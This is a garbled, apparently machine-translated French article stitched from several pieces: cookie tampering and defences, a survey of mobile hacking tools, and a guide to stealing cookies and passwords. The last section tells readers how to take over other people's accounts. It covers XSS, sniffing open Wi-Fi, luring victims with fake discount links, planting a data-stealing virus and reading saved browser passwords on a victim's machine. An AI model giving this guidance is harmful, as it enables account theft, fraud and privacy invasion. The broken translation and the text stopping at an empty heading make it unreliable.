Comment intercepter les fichiers de cookies. Moyen facile de voler des biscuits. Accès physique aux données

La photo montre que le WordPress_Logged_in_263D663A02379B762464038 \u003d admin est présent dans le cookie. Cette valeur est sous une forme non cryptée dans le cookie et il est facile d'intercepter à l'aide de l'utilitaire d'Achille, mais généralement dans la plupart des cas d'Achille, vous ne pouvez voir qu'un hasch d'un enregistrement particulier. Avant d'envoyer une demande au serveur, vous pouvez essayer de remplacer cette ligne similaire (bien qu'il n'y ait aucun point dans ce cas) - le nombre de tentatives n'est pas limitée. Ensuite, envoyez cette demande au serveur à l'aide du bouton Envoyer, vous pouvez obtenir une réponse du serveur destiné à l'administrateur.

Dans l'exemple précédent, vous pouvez utiliser le sous-menu direct de l'ID utilisateur. De plus, le nom du paramètre, dont la valeur fournit des capacités hachleurs supplémentaires peut être la suivante: Utilisateur (par exemple, utilisateur \u003d jdoe), toute expression avec un identifiant de chaîne (par exemple, utilisateur \u003d jdoe ou sessionID \u003d blahablah ), admin (par exemple, admin \u003d true), session (par exemple, session \u003d actif), panier (par exemple, panier \u003d complet), ainsi que des expressions telles que Vraie, False, active, inactive. En règle générale, le format de fichier de cookie dépend très dépendant de l'application, répondant aux besoins qu'ils sont utilisés. Cependant, les applications suivantes pour la recherche d'applications utilisant des cookies conviennent à presque tous les formats.

Mesures visant à contrer les informations des fichiers de cookies effectués du côté du client

En général, l'utilisateur doit se rapporter avec soin sur des sites Web à l'aide de cookies pour l'authentification et le stockage de données importantes. Il convient également de rappeler que les fichiers de cookie d'authentification doivent prendre en charge au moins le protocole SSL pour chiffrer le nom d'utilisateur et le mot de passe, car en l'absence de ces données de protocole est transmise sous forme non cryptée, ce qui vous permet de les intercepter à l'aide du logiciel le plus simple. Pour Voir les données envoyées sur le réseau.

Le logiciel Kookaburra a développé un outil qui facilite l'utilisation de cookies. CookiePal s'appelle ( http://www.kburra.com/cpal.html (voir www.kburra.com)). Ce programme est conçu pour avertir l'utilisateur lorsque vous essayez d'installer un cookie sur la machine, tandis que l'utilisateur peut activer ou désactiver cette action. Des fonctions similaires de blocage des cookies aujourd'hui sont dans tous les navigateurs.

Une autre raison de l'installation régulière des mises à jour du navigateur Web est constamment détectée avec les saisies du système de sécurité de ces programmes. Ainsi, Benet Haselton (Bennet Haselton) et Jamie McCarthy (Jamie McCarthy) ont créé un script qui, après avoir cliqué sur le lien retrie les cookies de la machine cliente. En conséquence, tout le contenu des cookies figurant sur la machine de l'utilisateur devient disponible.

Le piratage d'une telle nature peut également être effectué à l'aide d'un descripteur

Pour que ces éléments ne menacent pas nos données personnelles, je le fais vous-même et je conseille toujours à tous de mettre à jour les logiciels, de travailler avec le code HTML (clients e-mail, lecteurs multimédias, navigateurs, etc.).

Beaucoup préfèrent simplement bloquer la réception des cookies. Cependant, la plupart des nœuds Web ont besoin d'un support de cookie. Conclusion - Si une technologie innovante apparaît dans un proche avenir, elle se fera sans cookie, programmeurs et administrateurs soupira de soulagement, mais pour l'instant, le cookie reste un morceau de rassemblement pour le piratage! C'est vrai, puisqu'il n'y a pas de meilleure alternative encore.

Les contre-actions effectuées sur le côté serveur

Dans le cas de recommandations pour assurer la sécurité du serveur, les spécialistes donnent un simple conseil: n'utilisez pas de cookie sans aucun besoin particulier! Il est particulièrement nécessaire de faire attention lorsque vous utilisez des cookies qui restent dans le système utilisateur après avoir terminé la session de communication.

Bien entendu, il est important de comprendre que les cookies peuvent être utilisés pour assurer la sécurité des serveurs Web pour mettre en œuvre une autorisation de l'utilisateur. Si vous avez toujours une application développée, vous devez utiliser des cookies, puis ce mécanisme doit être configuré de manière à ce que chaque session varie de différentes clés contenant une courte période d'action, tout en essayant de ne pas mettre dans ces fichiers d'informations qui peuvent être utilisé des pirates informatiques pour le piratage (tels que admin \u003d vrai).

De plus, pour assurer une plus grande sécurité lorsque vous travaillez avec des cookies, vous pouvez utiliser leur cryptage pour éviter d'extraire des informations importantes. Bien entendu, le cryptage ne résout pas tous les problèmes de sécurité lorsque vous travaillez avec des cookies, cette méthode empêchera les hacks les plus simples décrits ci-dessus.

"Smartphone avec des utilitaires hackers? Non, "nous l'aurions récemment dit. Pour exécuter Cairca, les outils habituels pour la mise en œuvre des attaques ne pouvaient être que sur n'importe quel maténo. Maintenant, de nombreux outils familiers portés sous IOS et Android, et certains hack Tulza ont été spécialement écrits pour des environs mobiles. Un smartphone peut-il remplacer un ordinateur portable dans des tests de pénétration? Nous avons décidé de vérifier.

Android

Android est une plate-forme populaire non seulement pour les mortels ordinaires, mais aussi pour les bonnes personnes. Le nombre d'utiles] [- Les utilitaires ici font simplement des rouleaux. Pour cela, vous pouvez dire grâce aux racines UNIX du système - il a grandement simplifié de porter de nombreux outils sur Android. Hélas, certains d'entre eux google n'autorisent pas le magasin de jeu. Vous devez donc mettre l'apk approprié manuellement. De plus, pour certains utilitaires, vous avez besoin d'un accès maximal au système (par exemple, du pare-feu IPTABLES), vous devez donc vous occuper d'un accès root à l'avance. Pour chaque fabricant, sa propre technologie est utilisée ici, mais trouve simplement les instructions nécessaires. Un bon ensemble de HOWTO a collecté la ressource Lifehacker (Bit.ly/ewgdlu). Toutefois, si un modèle a échoué ici, il s'agit toujours de l'aide de XDA-Developers (www.xda-developers.com), où vous trouverez diverses informations en fait selon n'importe quel modèle téléphonique Android. Une manière ou une autre, une partie des utilitaires décrits gagnera et sans accès root.

Directeur chargé d'emballage

Botbrew Commençons par un examen d'un gestionnaire de paquets inhabituel. Les développeurs appellent cela «utilitaires pour les super-up», et ce n'est pas loin de la vérité. Après avoir installé Bottbrew, vous obtenez un référentiel où vous pouvez télécharger une énorme quantité d'outils compilés Android. Parmi eux: les interprètes de Python et de Ruby pour lancer de nombreux outils qui sont écrits sur eux, TCPDump Sniffer et NMAP Scanner pour l'analyse de réseau, Git et Subversion pour travailler avec les systèmes de contrôle de la version et bien plus encore.

Scanners de réseau

Pips. Un smartphone invisible, qui, contrairement à un ordinateur portable, est facilement placé dans sa poche et ne cause jamais de suspicion, peut être utile pour la mise en réseau. Ci-dessus, nous avons déjà dit comment installer NMAP, mais il y a une autre option. PIPS est un Android spécialement adapté, bien que le port non officiel du scanner NMAP. Donc, vous serez en mesure de trouver rapidement des périphériques actifs sur le réseau, de déterminer leur système d'exploitation à l'aide d'options d'empreintes digitales, de numériser les ports - en bref, faites tout ce que NMAP est capable. Fantaisie. En utilisant NMAP, malgré tout son pouvoir, il y a deux problèmes. Premièrement, les paramètres de balayage sont transmis via les touches de démarrage, que vous devez non seulement savoir, mais également pour pouvoir entrer avec un clavier mobile inconfortable. Et deuxièmement, la numérisation entraîne la conclusion de la console n'est pas si visuelle, comme je le souhaiterais. Ces lacunes sont privées du scanner FING, qui analyse très rapidement le réseau, crée des empreintes digitales, après quoi il affiche une liste de tous les périphériques disponibles, les séparant par type (routeur, bureau, iphone, etc.). Dans le même temps, pour chaque hôte, vous pouvez voir rapidement la liste des ports ouverts. Et à partir d'ici, vous pouvez vous connecter, disons, à FTP, à l'aide du client FTP installé dans le système, est très pratique. NetAudit. Lorsqu'il s'agit d'analyser un hôte spécifique, l'utilitaire NetAudit peut être irremplaçable. Il fonctionne sur n'importe quel périphérique Android (même indigne) et permet non seulement d'identifier rapidement les périphériques du réseau, mais également de les explorer à l'aide d'une grande base de données d'empreintes digitales pour déterminer le système d'exploitation, ainsi que les systèmes CMS utilisés sur un serveur Web. Maintenant à la base de plus de 3000 empreintes digitales numériques. Outils nets. Si vous avez besoin, au contraire, travaillez au niveau ci-dessous et examinez minutieusement le fonctionnement du réseau, il n'est pas nécessaire de faire sans outils nets. Il s'agit d'un utilitaire indispensable défini dans le fonctionnement de l'administrateur système, ce qui vous permet de numériser complètement le fonctionnement du réseau auquel le périphérique est connecté. Le paquet contient plus de 15 types de programmes différents, tels que Ping, Traceroute, ARP, DNS, NetStat, Itinéraire.

Manipulation avec trafic

Requin pour la racine. Basé sur TCPDummp Sniffer se connecte honnêtement dans un fichier PCAP toutes les données pouvant être explorées plus avant à l'aide de l'utilitaire habituel comme Wireshark ou Miner de réseau. Étant donné qu'aucune possibilité d'attaques MITM n'est implémentée, c'est plutôt un outil d'analyse de votre trafic. Par exemple, c'est un excellent moyen d'explorer les programmes définis sur votre appareil à partir de référentiels douteurs. FACEENIFF. Si nous parlons des applications de combat Android, l'une des plus sensationnelles est faceniff, mettant en œuvre l'interception et l'introduction dans les sessions Web interceptées. En téléchargeant le package APK avec le programme, vous pouvez presque sur n'importe quel Android-smartphone pour démarrer ce piratage et vous connecter au réseau sans fil, intercepter des comptes de divers services: Facebook, Twitter, Vkontakte et ainsi de suite - seulement plus de dix. La session de détournement est effectuée par l'utilisation de l'attaque d'usurpation ARP, mais l'attaque n'est possible que sur des connexions non protégées (faceniff ne peut pas être intégrée au trafic SSL). Pour restreindre le flux des scripts, l'auteur a limité le nombre maximum de trois sessions - alors vous devez vous reporter au développeur pour un code d'activation spécial. Droidsheep Si le Creator FaceCIFF souhaite utiliser un argent, DROIDSHEEP est un outil totalement libre avec le même fonctionnel. TRUE, sur le site officiel, vous ne trouverez pas de distribution (cela est dû aux lois difficiles de l'Allemagne en termes d'utilité de sécurité), mais on peut trouver dans le réseau sans aucun problème. La tâche principale de l'utilité consiste à intercepter des sessions Web personnalisées de réseaux sociaux populaires mis en œuvre à l'aide de tous les mêmes spoofing ARP. Mais avec les troubles de la connexion sécurisée: comme faceniff, Drarothsheep refuse de travailler avec le protocole HTTPS. Spoofer du réseau. Cet utilitaire démontre également des réseaux sans fil ouverts infructueux, mais quelque peu dans un autre avion. Il n'intercepte pas les sessions personnalisées, mais vous permet de sauver le trafic HTTP à l'aide d'une attaque d'usurpation, effectuant les manipulations définies avec elle. À partir de farces ordinaires (remplacez toutes les images sur le site par Troll clignote, retournez toutes les images ou, par exemple, changez d'émission de Google) et terminez par des attaques de phishing lorsque l'utilisateur correspond aux fausses pages de ces services populaires tels que Facebook.com , Linkedin.com, vkontakte.ru et beaucoup d'autres. Anti (Toolkit de réseau Android de Zimperium Ltd)
Si vous demandez ce qu'est un utilitaire de piratage pour Android est le plus puissant, alors anti anti, aucun concurrence. Ceci est un vrai pirate informatique. La tâche principale du programme est de numériser un périmètre réseau. Ensuite, divers modules entrent dans la bataille, avec l'aide d'un arsenal entièrement mis en œuvre: il s'agit également d'un auditeur de la circulation et de l'exécution des attaques de MITM et le fonctionnement des vulnérabilités trouvées. Vrai, il y a aussi ses inconvénients. La première chose qui se précipite dans les yeux est d'utiliser des vulnérabilités uniquement à partir du serveur de programme central, qui est sur Internet, à la suite de laquelle les objectifs qui ne disposent pas d'une adresse IP externe ne peuvent être oubliés.

Tunnneling de la circulation

Commandant total. Gestionnaire de fichiers bien connu maintenant et sur les smartphones! Comme dans la version de bureau, il existe un système de plug-ins ici pour se connecter à divers répertoires de réseau, ainsi que du mode canonique à deux couches - particulièrement pratique sur les comprimés. Tunnel SSH. Eh bien, mais comment assurer la sécurité de vos données, qui sont transmises dans un réseau sans fil ouvert? En plus du VPN, quel et Android prend en charge la boîte, vous pouvez élever un tunnel SSH. Pour ce faire, il existe un merveilleux utilitaire de tunnel SSH qui vous permet de envelopper le serveur SSH distant des applications sélectionnées ou de l'ensemble du système dans son ensemble. Les proxydroides doivent souvent commencer le trafic via le proxy ou le jus, et dans ce cas, le proxydroid aidera. Tout est simple: vous choisissez, quelles applications avez-vous besoin de tunneling et spécifiez un proxy (prise en charge HTTP / HTTPS / SOCKS4 / SOCKS5). Si vous avez besoin d'autorisation, ProxyDroid est également pris en charge. À propos, la configuration peut être ennuyée sur un réseau sans fil spécifique en faisant des paramètres différents pour chacun d'eux.

Réseaux sans fil

Analyseur WiFi Le gestionnaire de réseau sans fil intégré ne diffère pas de manière informative. Si vous avez besoin d'obtenir une image complète du nombre de points d'accès, l'utilitaire WiFi Analyzer est un excellent choix. Il ne montrera pas seulement tous les points d'accès à proximité, mais affiche également la chaîne sur laquelle ils fonctionnent, leur adresse MAC et, ce qui est le plus important par le type de cryptage (voir les lettres chéries "wep", nous pouvons supposer que l'accès au réseau protégé est fourni). De plus, l'utilitaire est idéal si vous devez trouver où le point d'accès souhaité est physiquement situé, grâce à l'indicateur visuel du niveau de signal. Wifikill Cet utilitaire, car son développeur déclare, peut être utile lorsqu'un réseau sans fil est bouché avec des clients qui utilisent tout le canal, à savoir à ce moment-là, vous avez besoin d'une bonne connexion et d'une connexion stable. Wifikill vous permet de désactiver les clients d'Internet tels que sélectivement et sur un critère spécifique (par exemple, il est possible d'appuyer sur toutes les pommes). Le programme d'All-Aller à l'ARP Spoofing Attack et redirige tous les clients à eux-mêmes. Cet algorithme à la stupidité est simplement mis en œuvre sur la base des IPTABLES. Un tel panneau de commande pour les réseaux sans fil à condition rapide :).

Audit d'application Web

Builder de requête HTTP. Manipuler des demandes HTTP à partir d'une entreprise d'ordinateur - PLEUM, il existe une énorme quantité d'utilitaires et de plug-ins pour navigateurs. Dans le cas d'un smartphone, tout est plus compliqué. Envoyez une demande HTTP personnalisée avec les paramètres dont vous avez besoin, tels que l'agent de cookie souhaité ou modifié, aidera HTTP Query Builder. Le résultat de la requête sera affiché dans un navigateur standard. Router Brute Force Ads 2 Si le site est protégé par un mot de passe à l'aide de l'authentification d'accès de base, vous pouvez vérifier sa fiabilité à l'aide de l'utilitaire d'annonces de routeur Brute Brute Force 2. Initialement, l'utilitaire a été créé pour les mots de passe de goofer sur le routeur de réglage, mais il est clair que cela peut être utilisé et contre toute autre ressource avec une protection similaire. L'utilitaire fonctionne, mais clairement humide. Par exemple, le développeur ne fournit pas de buste rugueux, et seuls les brutfeurs dans le dictionnaire sont possibles. Andoside Vous avez sûrement entendu parler d'un programme aussi sensationnel de dépassement des serveurs Web, comme Slowloris. Le principe de son action: créer et maintenir le nombre maximal de connexions avec un serveur Web distant, ce qui ne permet donc pas de se connecter à de nouveaux clients. ANDOSID est donc un analogue de la ralentilande droite dans Android-Deva! Je dirai en secret, deux cents connexions suffisent pour assurer un travail instable à chaque quatrième site Web exécutant Apache Web Server. Et tout cela - de votre téléphone!

Utilité différente

Encoder. Lorsque vous travaillez avec de nombreuses applications Web et analyse leur logique, il est souvent courant que les données transmises sous forme codée, à savoir BASE64. L'encode vous aidera à décoder ces données et à voir ce qu'elle est stockée. Peut-être substituer les devis, les codés à la base64 et en substituant le site étudié de l'URL, vous obtiendrez une erreur chérie d'effectuer une base de données. Heexeditor Si vous avez besoin d'un éditeur hexagonal, il a également pour Android. En utilisant Hexeditor, vous serez en mesure de modifier tous les fichiers, y compris le système, si vous améliorez le programme du droit à superutilisateur. Excellent remplacement de l'éditeur de texte standard, vous permettant de trouver facilement le fragment de texte souhaité et de le changer.

Accès à distance

ConnectBot ayant accès à un hôte distant, vous devez pouvoir l'utiliser. Et pour cela, vous avez besoin de clients. Commençons par SSH, où la standard de facto est déjà connectée. En plus de l'interface conviviale, il offre la possibilité d'organiser des tunnels protégés via des connexions SSH. PocketCloud RDP / VNC Programme utile pour se connecter à un bureau distant via RDP ou VNC Services. Il est très heureux que ceux-ci soient deux clients en une seule, il n'est pas nécessaire d'utiliser différentes tills pour RDP et VNC. Navigateur SNMP MIB. Spécialement écrit pour le navigateur Android MIB, avec lequel vous pouvez gérer les périphériques réseau via le protocole SNMP. Il peut être utile pour le développement du vecteur d'attaque de divers routeurs, car la chaîne de communauté standard (simplement mettre, personne n'a annulé le mot de passe pour contrôler via SNMP.

iOS.

Pas moins populaire parmi les développeurs de la plate-forme Security-Utilitaires iOS. Mais si dans le cas des droits des racines androides, ils n'avaient besoin que pour certaines applications, puis sur des appareils d'Apple Jailbreak presque toujours. Heureusement, même pour le dernier firmware d'Idevis (5.1.1), il existe déjà une boîte à outils pour Jailbreak. Ensemble avec un accès complet, vous obtenez toujours un gestionnaire d'applications Cydia alternatif, qui contenait déjà de nombreux services publics.

Travailler avec le système

Mobile La première chose que je veux démarrer est l'installation du terminal. Pour des raisons évidentes, il n'existe pas de norme pour le système d'exploitation mobile, mais il sera nécessaire d'exécuter les utilitaires de la console que nous allons continuer à parler. La meilleure mise en œuvre de l'émulateur du terminal est mobileterminale - elle prend en charge plusieurs terminaux immédiatement, contrôler les gestes (par exemple, transmettre le contrôle-c) et est généralement impressionnant avec sa réflexion. ISSH. Une autre option plus complexe pour accéder à la console de périphérique consiste à installer OpenSSH dessus (cela se déroule via Cydia) et de vous connecter localement via un client SSH. Si vous utilisez le bon client comme ISSH, dans lequel le contrôle de l'écran tactile est incroyablement implémenté, cette méthode est encore plus pratique que par le biais de MobileTerminal.

Interception des données

Pirni & Pirni Pro Maintenant que l'accès à la console est, vous pouvez essayer des utilitaires. Commençons par Pirni, qui entra dans l'histoire comme un renifleur complet pour iOS. Malheureusement, un module Wi-Fi limité constructif intégré à l'appareil ne peut pas être traduit en mode Promiscios nécessaire pour une interception normale des données. Ainsi, un spoofing classique ARP est utilisé pour intercepter les données, avec laquelle tout le trafic est transmis par l'appareil lui-même. La version standard de l'utilitaire fonctionne à partir de la console, où en plus des paramètres de l'attaque MITM, le nom du fichier PCAP est spécifié dans lequel tout le trafic est enregistré. L'utilitaire dispose d'une version plus avancée - Pirni Pro, qui dispose d'une interface graphique. De plus, il sait comment transmettre le trafic http à la volée et tirer automatiquement des données intéressantes à partir de là (par exemple, login-mots de passe), en utilisant des expressions régulières pour cela spécifiées dans les paramètres. Intercepter-ng (édition de console) Le notoire Sniffer Intercepter-Ng, que nous avons écrit à plusieurs reprises, a récemment une version de la console. Comme l'auteur dit, la majeure partie du code est écrite sur Pure ANSI C, ce qui se comporte de manière égale dans n'importe quel environnement, la version de la console depuis le début a gagné à la fois des fenêtres de bureau, Linux et BSD et sur des plates-formes mobiles, y compris iOS et Android. . La version de la console a déjà mis en œuvre des mots de passe saisissants en fonction des protocoles les plus différents, l'interception de messages de messagers (ICQ / Jabber et de nombreux autres), ainsi que la résurrection des fichiers de trafic (http / ftp / imap / pop3 / smp / pOP3 / SMTP / SMB). Les fonctions de balayage réseau et le poison ARP de haute qualité sont disponibles. Pour un fonctionnement correct, vous devez d'abord installer via un package Cydia libpcap (n'oubliez pas d'inclure des packages de développeurs dans les paramètres). L'ensemble des instructions de démarrage s'installa pour installer les droits de droite: chmod + x intercepter_ios. Ensuite, si vous exécutez un sniffer sans paramètres, une interface interactive claire de l'iTERCEPTER apparaîtra, ce qui vous permet de démarrer toutes les attaques. Ettercap-ng. Il est difficile de croire, mais cet outil complexe pour la mise en œuvre d'attaques MITM était toujours porté sous IOS. Après un travail énorme, il a révélé un port mobile à part entière. Pour vous sauver de la danse avec un tambourin autour de dépendances lors de la compilation automatique, il est préférable d'installer le paquet déjà assemblé à l'aide de Cydia, après avoir ajouté la source de données avec theWorm.altervista.org/cydia (référentiel Twrepo). Le kit est également l'utilitaire EtterLog, qui aide à extraire des informations utiles à partir du dépotoir collecté de divers types de trafic (par exemple, les comptes d'accès à FTP).

Analyse des réseaux sans fil

Analyseur WiFi Dans les anciennes versions d'IOS, les artisans ont lancé l'aircrack et pourraient casser la clé WEP, mais nous avons vérifié: le programme ne fonctionne pas sur de nouveaux appareils. Par conséquent, pour étudier une connexion Wi-Fi, nous devrons être satisfaits uniquement avec uniquement des scanners Wi-Fi. WiFi Analyzer analyse et affiche des informations sur tous les réseaux 802.11 disponibles, y compris des informations sur la SSID, les canaux, les fournisseurs, les adresses MAC et les types de chiffrement. L'utilitaire construit des graphiques visuels en temps réel en fonction des données présentes. Avec un tel programme, il est facile de trouver un emplacement physique d'un point si vous l'avez soudainement oublié et, par exemple, de regarder la broche WPS, qui peut être utile pour la connexion.

Scanners de réseau

Scany quel programme utilise n'importe quel mangeoire à tout moment de la planète quelles que soient les objectifs et les tâches? Scanner de réseau. Et dans le cas d'iOS, il est probable que ce soit le tulk scany le plus puissant. Grâce à l'ensemble des utilitaires intégrés, vous pouvez rapidement obtenir une image détaillée des périphériques réseau et, par exemple, des ports ouverts. De plus, le colis comprend des utilitaires de test réseau, tels que Ping, Traceroute, NSLOOKUP. Cependant, beaucoup préfèrent la Fing. Le scanner a une fonctionnalité assez simple et limitée, mais elle suffit pour la première connaissance avec le réseau, par exemple, la cafétéria :). Les résultats affichent des informations sur les services disponibles sur des machines distantes, des adresses MAC et des noms d'hôte connectés au réseau numérisé. Nikto semblerait avoir oublié Nikto, mais pourquoi? Après tout, ce scanner Web de vulnérabilité écrit dans la langue de script (nommément sur PERL), vous pouvez facilement installer via Cydia. Et cela signifie que vous pouvez facilement l'exécuter sur votre périphérique de jailbreak à partir du terminal. NIKTO vous fournira volontiers des informations supplémentaires sur le test de ressources Web. De plus, vous pouvez ajouter vos propres signatures à votre base de données de connaissances avec vos propres mains. SQLMAP Cet outil puissant pour le fonctionnement automatique des vulnérabilités SQL est écrit en python et définit donc l'interprète, ils peuvent être utilisés sans aucun problème directement à partir du périphérique mobile.

Télécommande

SNMP SCAN. De nombreux appareils réseau (y compris des routeurs coûteux) sont gérés par le protocole SNMP. Cet utilitaire vous permet de numériser le sous-réseau pour les services SNMP disponibles avec une valeur prédéterminée de chaîne communautaire (simplement mettre, des mots de passe standard). Notez que la recherche de services SNMP avec chaîne communautaire standard (publique / privée) dans une tentative d'accès à la gestion des périphériques fait partie intégrante de tout test de pénétration ainsi que de l'identification et de la détection de périmètre des services. ITAP Mobile RDP / ITAP Mobile VNC Deux utilitaires d'un fabricant sont conçus pour se connecter à un bureau distant à l'aide de protocoles RDP et VNC. Il existe de nombreux utilitaires similaires dans l'App Store, mais ils sont particulièrement pratiques à utiliser.

Récupération de mot de passe

Hydre. Le programme légendaire qui aide «rappelez-vous» le mot de passe à des millions de pirates hachers du monde entier a été porté sous IOS. Maintenant directement à partir de l'iPhone, des mots de passe possibles pour des services tels que HTTP, FTP, Telnet, SSH, SMB, VNC, SMTP, POP3 et bien d'autres. Vrai, pour une attaque plus efficace, il est préférable de mettre en place de bons dictionnaires pour Brutfors. Passer mule. Tout le monde ne connaît pas d'abord une telle vulnérabilité comme l'utilisation de mots de passe standard. Pass Mule est une sorte de livre de référence dans lequel toutes sortes de connexions et de mots de passe standard pour les périphériques réseau sont collectées. Ils sont correctement décomposés par les noms de fournisseurs, produits et modèles, il ne sera donc pas difficile de trouver le nécessaire. Le programme est plutôt conçu pour gagner du temps sur la recherche du manuel sur le routeur, la connexion et le mot de passe standard pour lesquels vous devez savoir.

Fonctionnement des vulnérabilités

Métasploit.
Il est difficile d'imaginer un utilitaire plus hardinateur que métasploitant - et c'est qu'elle complète notre revue d'aujourd'hui. Metasploit est un paquet de divers outils, dont la tâche principale consiste à utiliser des vulnérabilités dans des logiciels. Imaginez: environ 1000 fiable, prouvée et nécessaire dans la vie quotidienne de l'exploit pentester - juste sur le smartphone! Avec l'aide d'un tel outil, vous pouvez réellement régler sur n'importe quel réseau. Metasploitit permet non seulement d'utiliser des barres dans des applications de serveur - un outil d'attaque sur les applications clientes sont également disponibles (par exemple, via le module Autopwn du navigateur, lorsqu'une charge de combat est insérée dans le trafic client). Il faut dire ici que la version mobile de l'Adobe n'existe pas, mais le package standard peut être installé sur le périphérique Apple en utilisant.

Méthodes de vol de fichiers de cookies

Une telle méthode de piratage en tant que cookies est parfaite et utilisée par de nombreux hackers. Si vous voulez aussi l'essayer, mais ne savez pas quoi faire, lire nos recommandations.

Qu'est-ce que les cookies?

Ceci est l'information sur la visite de l'utilisateur d'un site particulier. Il est stocké dans un document texte distinct. Vous pouvez trouver une information différente. Y compris les connexions, les mots de passe, les adresses de boîte aux lettres postales et les numéros de téléphone. C'est pourquoi les pirates cherchent à obtenir ces documents. Pour voler les matériaux nécessaires, des pirates sont recours à différentes méthodes.

Méthodes de vol de biscuits

Vulnérabilité XSS

Il peut être trouvé et utilisé sur n'importe quel site. Lorsqu'un spécialiste trouve une vulnérabilité, il introduit un code spécial. Selon le but des codes, ils sont différents, ils sont écrits sous une ressource spécifique. Lorsque l'utilisateur entre cette page et la met à jour, toutes les modifications sont appliquées. Act de démarrage de code - il est intégré à l'ordinateur de la victime et recueille toutes les informations nécessaires du navigateur.

Pour effectuer le code, vous pouvez utiliser n'importe quel type de vulnérabilités - une erreur sur la ressource Web dans le navigateur ou le système informatique.

Il existe 2 types d'attaques XSS:

Passif - Objectif sur la page de script. Dans ce cas, vous devez rechercher des endroits vulnérables dans les éléments de la page. Par exemple, onglet avec dialogues, boîte de recherche, catalogue vidéo, etc.

actif - Ils doivent être signés sur le serveur. Particulièrement souvent sur divers forums, blogs et salles de discussion.

Comment faire appliquer une personne xss?

La tâche n'est pas facile, car souvent pour activer le code que vous souhaitez cliquer sur le lien avec celui-ci. Vous pouvez dissimuler le lien et envoyer la lettre avec une offre intéressante. Par exemple, pour offrir une grande réduction dans la boutique en ligne. Vous pouvez également tout mettre en œuvre sur la photo. L'utilisateur est susceptible de le regarder et ne soupçonnera rien.

Installation de Sniffera

C'est l'introduction de programmes spécialisés pour suivre le trafic sur le périphérique de quelqu'un d'autre. Sniffer vous permet d'intercepter des sessions transmises avec les données d'autres personnes. Vous pouvez donc obtenir toutes les connexions et mots de passe, adresses, toutes les informations importantes transmises par l'utilisateur. Dans le même temps, les attaques sont le plus souvent effectuées sur des données HTTP non protégées. Pour cela, une connexion Wi-Fi non protégée est bien adaptée.

Vous pouvez mettre en œuvre Sniffer de plusieurs manières:

  • Copier le trafic;
  • Analyse des données utilisant des attaques contre la circulation;
  • Écouter des interfaces;
  • Mettre en œuvre un renifleur dans la pause des canaux.
Cookies de substitution.

Toutes les données sont stockées sur un serveur Web sous forme d'origine. Si vous les changez, il sera considéré comme une substitution. Tous les matériaux obtenus peuvent être utilisés sur un autre ordinateur. Vous recevrez donc un accès complet aux données personnelles de l'utilisateur. Vous pouvez modifier les cookies à l'aide des paramètres dans le navigateur, les addons ou les programmes spéciaux. La modification est également possible dans n'importe quel ordinateur portable standard sur PC.

Cookies avec virus

Les spécialistes conseillent de ne pas utiliser de cookies, s'il n'y a pas de besoin particulier à celui-ci. S'il est possible de les éteindre, il vaut mieux le faire. Tous parce que les cookies sont très vulnérables. Ils volent souvent des attaquants. Dans ces fichiers, vous pouvez obtenir un grand nombre d'informations personnelles confidentielles qui seront utilisées contre une personne. La vue la plus dangereuse des fichiers - ceux qui restent dans le système lorsque la session est déjà terminée.

Les cookies volent souvent à l'aide d'un utilitaire viral. Cela se fait assez simple. Un virus est introduit dans n'importe quel utilité sécurisée qui collecte certains matériaux sur l'ordinateur. Le programme viral sera associé au serveur de son hôte. Le programme doit être configuré de sorte que le navigateur l'utilise comme serveur proxy.

Lorsque le PROG tombe sur le PC de la victime, il commencera automatiquement à collecter toutes les données stockées et à vous les envoyer.

Les virus sont différents, ils peuvent également différer. Certains vous permettent de contrôler entièrement le navigateur et de visualiser toutes les informations. D'autres sont capables de voler des matériaux protégés. Troisième collecter uniquement des données non protégées.

Vous avez peut-être des difficultés avec l'introduction d'un programme viral sur l'ordinateur de quelqu'un d'autre. Vous devez forcer l'utilisateur à le télécharger et à exécuter. Ici, vous pouvez lui envoyer une lettre en référence au programme ou donner le programme pour un coffre-fort et attendre, quand une personne lui-même le bloque de votre site.

Comment protéger les fichiers de cookies du vol?

La plupart des ressources Web ne sont pas assez protégées. Les pirates ont facilement trouvé des vulnérabilités et des erreurs sur ces plates-formes.

Règles de protection de la cuisson:

  1. Liez l'ID d'ordinateur à la session en cours. Ensuite, lors de la saisie du site d'un périphérique étranger, une nouvelle session sera démarrée, les données de la précédente ne fonctionneront pas.
  2. Attachez une session sur le navigateur. Le même principe fonctionnera comme dans le paragraphe précédent.
  3. Chiffrer les paramètres transmis sur le réseau. Ensuite, les informations enregistrées dans le document ne peuvent pas être comprises. Ce sera inutile pour qui l'a interceptée. Cette réception ne vous protégera pas à 100%, certains experts savent comment déchiffrer les matériaux.
  4. Créez un dossier séparé pour les personnes.

Comment découvrir le mot de passe du compte de quelqu'un d'autre via des cookies?

Pour obtenir les données d'autorisation des autres personnes, vous devez d'abord arriver au fichier dans lequel ils ont été enregistrés.

Pour ceux qui utilisent Mozilla Firefox, vous devez passer à l'onglet Outils, qui se trouve dans le menu principal. Ensuite, dans les paramètres système, vous trouverez la section "Protection", et vous devez rechercher toutes les informations importantes sur les comptes dans les réseaux sociaux. Tous les mots de passe sont masqués, cliquez sur le bouton "Affichage". Immédiatement, vous pouvez installer la protection et fournir un code spécial. Alors personne sauf que vous obtenez cette information.

L'opéra pour la visualisation générale est disponible uniquement par les noms d'utilisateur. Mais dans le menu, vous pouvez trouver le gestionnaire de mots de passe et afficher tous stockés sur l'ordinateur. La liste complète est dans le gestionnaire. Pour accéder à des mots de passe, vous devez installer une extension supplémentaire.

Dans Google Chrome, tous ces matériaux sont visibles dans les réglages étendus. Il y a un onglet avec tous les cookies stockés.

Malheureusement, le navigateur Internet Explorer standard n'a pas de telles fonctions. Pour trouver des informations sur les plates-formes Web, qui visitent le propriétaire du PC, vous devez télécharger un programme spécial. Sur Internet, on peut le trouver gratuitement, il est totalement sûr, mais il est préférable de le charger des sources éprouvées. N'oubliez pas que tout programme doit être vérifié par antivirus. Cela est particulièrement vrai de ces utilitaires qui fonctionnent avec des mots de passe.

Cette technique ne convient que ceux qui ont un accès physique à l'ordinateur de la victime. Vous pouvez également trouver le mot de passe de quelqu'un d'autre si une personne s'est connectée sur la plate-forme via votre PC et enregistré ses données.

Programmes de vol de fichiers cookies

